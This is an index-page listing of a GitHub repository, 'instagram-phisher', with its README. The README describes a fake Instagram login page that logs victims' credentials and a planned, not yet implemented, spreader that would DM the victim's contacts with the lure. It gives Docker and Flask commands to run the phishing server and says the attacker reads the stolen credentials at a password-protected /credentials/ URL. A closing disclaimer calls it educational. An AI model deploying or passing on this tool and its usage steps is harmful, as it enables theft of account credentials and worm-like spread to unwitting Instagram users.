Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/rmccrystal/instagram-phisher

Phishing tool for Instagram accounts
https://github.com/rmccrystal/instagram-phisher

Last synced: about 2 months ago
JSON representation

Phishing tool for Instagram accounts

Host: GitHub
URL: https://github.com/rmccrystal/instagram-phisher
Owner: rmccrystal
License: gpl-2.0
Created: 2019-04-17T00:11:38.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2024-10-31T05:25:33.000Z (2 months ago)
Last Synced: 2024-10-31T06:20:45.217Z (2 months ago)
Language: HTML
Homepage:
Size: 92.8 KB
Stars: 4
Watchers: 1
Forks: 1
Open Issues: 6
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

# Instagram Phisher
[![Build Status](https://img.shields.io/docker/cloud/automated/javaww/instagram-phisher.svg)](https://hub.docker.com/r/javaww/instagram-phisher)

Instagram-Phisher is a worm designed to spread across instagram and gain the credentials of as many users as possible. This tool has two parts:
### Web Server
The web server is a standard Instagram cradential phising webpage which logs all of the inputted craadentials. Once a user's cradentials are gained, the cradentials will be sent over to the spreading mechanism.
### Spreader
Once a user is compermised, this tool will DM a configurable message to all followers and people the user is following a configurable message in an attempt to get other people to click on a link and login to the fake instagram login page. **This feature has not been implemented yet.**
## Installation
#### With [Docker](https://www.docker.com/)
```bash
docker build -t instagram-phisher ./server
docker run -p 80:80 -e password=pass1234 instagram-phisher
```
Alternatively, you can pull the latest build from [Docker Hub](https://hub.docker.com/r/javaww/instagram-phisher)
```bash
docker run -p 80:80 -e password=pass1234 javaww/instagram-phisher
```
#### Manual installation
Install `python3` and `python3-pip`
Use pip to install the dependencies.
```bash
pip3 install -r ./server/requirements.txt
```
Run the server on port 80.
```bash
flask run -h 0.0.0.0 -p 80
```
## Usage
The victim will go to any url on the server to get to the fake login page. The attacker can view any logged credentials using the url `/credentials/(password)` with a configurable password.
## Contributing
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
## Legal
Usage of Instagram-Phisher for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. This software is for educational purposes only.